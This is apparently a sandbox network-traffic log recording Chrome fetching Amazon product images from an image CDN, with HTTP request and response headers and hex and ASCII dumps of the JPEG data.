                                                                                                                                                                                                        2024-08-15 13:37:59 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 31 36 37 35 35 65 30 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        26192.168.2.449775151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC688OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2879
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 0ac3d599-0c37-4636-8ec0-59ff5f62cf6a
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 29 Aug 2043 04:30:39 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1227601
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000141-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 86 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 08 05 07 01 03 04 02 09 10 00 02 01 03 03 02 04 03 06 07 00 03 00 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 22 41 51 07 14 71 32 33 42 61 62 91 08 15 23 52 81 a2 b1 53 83 a1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQq23Bab#RS
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: be 8a d3 d1 4b ad c6 a3 aa 20 f1 de 32 b2 9b 0b 46 ee 80 e5 73 34 8b f8 37 27 d5 70 99 d5 f7 bd 43 75 70 5e 59 66 69 d8 42 15 5a 56 2c c8 07 91 30 dd fc 80 92 2b 23 a7 f5 a6 9b 6b 04 50 36 8f 14 8d 1c 44 34 84 a1 67 6f 59 0e 63 66 2c 4f b9 61 55 5a 26 7e a3 f8 c6 6a 5d 4b 0d cc f1 58 e9 99 8b 4d 59 14 c7 01 8c 44 c5 e4 45 8a 47 93 cf 33 31 27 b7 9d 80 f4 0b 52 8e 88 b6 59 ee 67 81 d7 2e 96 97 8d 13 7a c7 24 0b e2 03 f4 65 ca 32 9c 87 53 83 e9 51 f3 d5 76 77 e7 c0 87 44 b3 84 cd 27 96 55 32 99 93 73 e4 60 ef 11 e4 76 e1 02 fb 0a 9e 74 2d a1 3a a5 e4 df 86 0d 3f 54 90 fd 3c 2f 0b fe b5 5a 15 43 2d 2f af 8f 87 23 96 28 ea 0f 94 c7 0f 7e 46 1b c2 94 8f a6 da e5 e6 d5 c8 89 84 af 89 77 14 21 a2 19 d8 ed 13 7b 15 f3 29 1c 85 ce 33 d8 8a cd d9 d9 bc d6 16 71 86
                                                                                                                                                                                                        Data Ascii: K 2Fs47'pCup^YfiBZV,0+#kP6D4goYcf,OaUZ&~j]KXMYDEG31'RYg.z$e2SQvwD'U2s`vt-:?T</ZC-/#(~Fw!{)3q
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC123INData Raw: ea 2d 58 bc 75 b2 6b 79 a4 f6 aa a7 e8 96 5a 97 53 38 87 4c b7 96 24 27 12 5f 4f 09 8a 18 07 a9 55 6c 19 5c 7a 20 e3 3c b1 ab 2d a1 68 76 ba 0d 9c 16 16 6a 44 51 03 cb 1d ce ec c7 73 bb b7 ab 3b 72 4d 65 c9 27 bd 7c d5 69 86 b4 8d 55 6b e7 b6 49 dd 8a 52 95 75 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 1f ff d9
                                                                                                                                                                                                        Data Ascii: -XukyZS8L$'_OUl\z <-hvjDQs;rMe'|iUkIRuRRRRRRRRRRR


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        27192.168.2.449776151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC681OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3600
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: fb4e6c4f-b370-40c2-b652-e30090d66620
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 26 Aug 2043 16:31:15 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 173870
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000039-IAD, cache-ewr-kewr1740033-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 a8 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 02 03 04 01 09 10 00 02 01 03 01 04 05 06 0a 08 05 05 00 00 00 00 01 02 03 00 04 11 05 06 12 13 21 07 31 41 61 71 22 32 51 81 93 d2 14 42 54 72 91 92 a1 b1 b2 c1 17 34
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Aaq"2QBTr4
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: d0 90 a9 8c ee 03 18 3d d8 25 97 78 81 e4 e3 ce 3c aa 27 6e 90 74 35 81 b7 62 b8 33 03 c9 43 26 3d 63 b2 91 bf 53 59 49 9d 7a 04 e2 da e4 29 8b 6a dd 15 9b 48 c1 51 4b 13 d8 aa 58 9f 50 e7 5d 3b 35 b4 ba 26 a1 6d 76 f7 72 05 90 07 e1 aa cb ba f9 51 d7 b9 8e ae c2 49 a5 e4 db eb 7d 9f bb 4b 06 79 2c dc f0 fc 8e 53 47 28 71 9d f5 97 ec 03 0b 51 95 fb e9 15 96 5b 4f 40 f3 9b c2 16 ba 30 8c 26 ab 21 1f 25 9b f1 25 4e d5 0c 6c 26 d8 0d a0 d7 a7 85 e2 40 f0 59 4c 4d d2 06 02 e4 17 44 05 09 03 28 bd 5f 39 6a 67 ac 15 a6 e5 51 c9 a3 d4 b7 b7 54 a9 28 27 90 aa 81 d2 55 ff 00 07 68 75 44 e0 86 c4 89 e5 99 30 39 a2 f6 04 cf 2f 9d 56 fe aa cf 48 77 76 91 ea da a0 22 3e 37 17 9b 3a 92 79 aa ee ff 00 0d 57 1a bb 8f 38 cf 91 74 a9 ef 2c 67 fa 90 fd ed 8b 5f 11 bd 26 07
                                                                                                                                                                                                        Data Ascii: =%x<'nt5b3C&=cSYIz)jHQKXP];5&mvrQI}Ky,SG(qQ[O@0&!%%Nl&@YLMD(_9jgQT('UhuD09/VHwv">7:yW8t,g_&
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC844INData Raw: 9a 95 1c d9 17 96 4d 4b f5 0a f4 7b 2a c9 ae dd 60 8f d4 e5 fc 69 53 55 56 ed 61 45 f6 74 d6 11 ba 85 dd 4a f4 d5 4a ad 39 74 e4 15 55 f6 df 53 b7 b2 d7 35 41 2d d2 c1 23 4e 38 68 d3 2a 71 08 55 3e 5f 6c 63 b1 4b 72 35 6a 29 32 e7 41 d3 6e 9d a5 9e c6 de 57 6e b7 78 11 dd bc 49 19 35 55 4a 3d a4 52 ce 3c cd 54 ab 2a 72 6d ac f9 15 14 5e 5a ce f2 c4 67 8d e5 47 50 dc 4e 1b 28 df f4 39 ce 47 a1 ba ab 11 1d b9 91 d3 7e 05 55 ce 58 4c 88 32 7a 87 92 c7 04 78 10 6a db 1d 98 d2 3f 76 da ff 00 2d 1f f6 a3 fe d8 d2 3f 76 da ff 00 2d 1f bb 55 c6 da b4 3c 15 1a 25 39 da d4 cf 69 49 3f fb f8 ff 00 65 37 6b 3b 29 5b 7a 3b b5 4e 7c c3 cc 88 e3 97 5e eb 10 71 db 9c f9 5c 80 ae 79 ec 1f 0a 16 f6 2c b9 f3 1e 54 53 dd d4 fc cb 75 e0 75 55 d1 7d 95 d2 47 5e 9d 6b fc bc 7e
                                                                                                                                                                                                        Data Ascii: MK{*`iSUVaEtJJ9tUS5A-#N8h*qU>_lcKr5j)2AnWnxI5UJ=R<T*rm^ZgGPN(9G~UXL2zxj?v-?v-U<%9iI?e7k;)[z;N|^q\y,TSuuU}G^k~


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        28192.168.2.449783151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC690OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3580
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 06f077da-e1a6-42ec-86ac-527eca432956
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 20:05:08 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 176460
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100112-IAD, cache-ewr-kewr1740071-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8e 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 07 06 08 03 04 09 01 02 10 00 02 01 03 03 02 03 06 04 03 07 05 01 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 22 51 07 14 41 61 71 91 08 32 81 a1 15 33 b1 16 23 42 62 72 92 93
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"QAaq23#Bbr
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: 37 84 ac 72 8c 8b c7 c0 36 14 91 fb 8a dd 5f 62 16 c1 3a 5e c1 b1 8d f2 5c b0 ff 00 91 94 35 69 3c 37 0d 39 00 90 72 17 69 c7 3e 5e df 5c af 1f a0 ad fc f6 63 e1 ff 00 66 b4 65 85 c3 84 80 0d ca 77 0c ab 1d d5 4c 67 ad 74 6f 93 be 39 67 fc 52 df 89 49 bc fd 3d 07 a2 5f 3f dc c2 95 ab d9 ad 90 fc 4a a9 17 fa 27 a3 5a 4f fb 49 5a dc dd c7 ff 00 bb 71 5a b1 4b 68 7a c4 fa 2d dd a5 fd b1 fe f6 da 45 75 e7 1b b6 f7 53 f2 75 ca 1f 93 57 a5 b6 17 f0 ea 36 d6 f7 76 e7 31 5c 44 8e 87 d5 64 01 85 79 a3 77 a6 cb 60 96 72 39 56 5b b8 04 b1 95 3b 86 d2 ef 11 56 f4 74 78 ca b0 f8 56 e2 fe 1f 75 ff 00 e2 3a 1b e9 ee 72 fa 74 c5 47 af 85 36 64 8f ec db d0 7c 96 a2 af 8d 75 52 fd 7f 73 99 ae 48 e7 dd ad 87 e8 dc ca 7f 6c 54 7c 17 89 73 1c 72 8e ea 0e 47 c4 ab 63 70 1f d4
                                                                                                                                                                                                        Data Ascii: 7r6_b:^\5i<79ri>^\cfewLgto9gRI=_?J'ZOIZqZKhz-EuSuW6v1\Ddyw`r9V[;VtxVu:rtG6d|uRsHlT|srGcp
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC824INData Raw: c7 0f bf 85 62 71 ca 36 40 4c 29 0a 0a 85 cb 37 88 6b 06 eb 4e 94 d0 f4 0d 3f 78 2f 0d c9 27 c1 40 c6 56 9f d7 7a b7 65 5e db c6 31 52 29 a9 dc ce ad e0 ce b1 83 c7 88 bf 9d 70 36 06 52 72 03 6c f2 86 c6 40 24 82 0b b9 34 6d d2 ca 6e 27 f1 dd 9e 45 66 0c ec c5 d9 8a f1 cb 12 4d 73 ef e2 73 67 7f 7e 4d 3a 7f df f8 fa c7 d3 8b 2e 3f 79 74 31 bd bb 6d 75 60 ca e3 82 85 08 60 7d 41 04 57 a7 1d 39 ad 2e bb a6 d8 6a 2b c7 bd db c4 e4 7a 17 50 58 7e 8d 91 5e 79 f4 8f 44 de f5 44 eb 1d be d8 a3 3d e7 7c ec f9 ed 03 97 35 bf 5d 0f d3 03 a5 74 9b 4d 2d 67 33 88 7c 43 e2 95 09 93 2b 99 4e 17 2d 80 0b 70 32 68 af 1c bd b2 c5 19 22 a9 48 a4 f7 a3 3c 84 ff 00 3a 59 5b fd cc 4d 5c 53 c9 b4 55 2b a9 5b 8b bd 42 e9 f7 ba 00 ea 02 c7 23 44 3c 80 0e c0 81 54 ad f3 ed f8 33
                                                                                                                                                                                                        Data Ascii: bq6@L)7kN?x/'@Vze^1R)p6Rrl@$4mn'EfMssg~M:.?yt1mu``}AW9.j+zPX~^yDD=|5]tM-g3|C+N-p2h"H<:Y[M\SU+[B#D<T3


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        29192.168.2.449781151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC667OUTGET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 8552
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 31766cf3-5849-490e-a3ae-ae5e3ea2717b
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Fri, 02 Aug 2024 07:45:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 28 Jul 2044 07:53:22 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1143875
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100152-IAD, cache-nyc-kteb1890051-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 01 04 05 06 08 09 03 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea e0 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*0{"6
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: 98 90 db 57 16 75 d1 d9 9f 45 ab 3f 95 62 8d 75 22 5a 0b 7c 87 11 08 7a 5c aa b4 c1 34 8c fb 4e 87 35 1d 97 62 53 ad 9b 6d b3 6f 08 ec 8b 00 2d 8f 02 4d 51 52 9a 6d d5 66 3c 3a 08 0e c8 39 62 b2 43 46 1c 11 38 ae 14 08 d8 b0 a5 2e 58 bf 52 a3 48 96 fc 9c 1d cd d4 82 66 f9 ae 50 5c 1b 63 67 9c 97 cf d3 8f 6e 17 98 e7 21 8c 1b 1b 0e d3 4e b8 f5 5a 97 48 8c ad 0f 64 a8 f7 78 f1 18 64 15 8b f4 67 57 4e 12 e4 8c 56 c9 c2 0d c6 23 3b 34 9d 86 51 a3 b3 30 22 bb bc d3 6e 71 5b cc 54 ae b5 12 98 b9 c7 7c b0 6d fb 8b 11 8b 07 3a d4 4a 66 e7 1d f2 c0 3d 50 f6 e3 3f cb bf c2 12 e3 6f 15 a4 4a 6e c3 24 c7 2a 30 50 55 12 f0 f4 c5 70 09 a2 b8 db 8e 69 36 8b 2e 20 c9 69 5a 5e 89 28 d0 19 70 01 01 10 53 81 78 6c c9 55 6a e1 6c e4 50 75 f0 f4 52 57 15 fa bf 2f ea 8e 9a f0
                                                                                                                                                                                                        Data Ascii: WuE?bu"Z|z\4N5bSmo-MQRmf<:9bCF8.XRHfP\cgn!NZHdxdgWNV#;4Q0"nq[T|m:Jf=P?oJn$*0PUpi6. iZ^(pSxlUjlPuRW/
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: 90 08 11 88 3e 81 10 ce 58 db 58 55 3f 1f 58 4b 3b 08 68 fe 9b a2 63 e0 5e 8a 5a 2b 60 e6 0c 32 9f 00 b1 3d c3 91 d8 92 7b fa ee 75 d6 06 20 e4 1b 49 18 f0 f1 31 31 31 31 31 e0 f4 80 81 37 13 61 89 b0 ce 66 c0 cd 81 9b 76 87 19 e9 fb e6 bd 17 a3 7b aa a7 ba aa 2d c8 df 6f 87 7f 19 a0 d5 6a a4 5b 49 0c f4 b5 6d ab 57 c3 b5 ad 81 7a 0a 91 02 53 c5 8b 46 0f 82 fb 6a 74 20 82 76 e1 7f 8a 71 05 34 f9 e9 29 a0 e5 f1 7f 6a c4 0d b0 d0 67 03 3e 0d dc 20 b0 64 57 70 a6 9f 99 ed 67 6d 9a bb da b6 c8 b9 f9 c8 9c ba b8 51 50 f1 0d 6a 7b f2 52 72 52 04 51 db f7 bf ff c4 00 2d 11 00 01 03 03 02 02 08 07 00 00 00 00 00 00 00 00 01 02 03 05 00 04 11 12 40 06 21 10 13 14 15 16 20 41 50 24 30 31 34 35 51 60 ff da 00 08 01 03 01 01 08 00 fe 98 ac 0a 4a c9 ae b4 d0 5a 89 e6
                                                                                                                                                                                                        Data Ascii: >XXU?XK;hc^Z+`2={u I111117afv{-oj[ImWzSFjt vq4)jg> dWpgmQPj{RrRQ-@! AP$0145Q`JZ
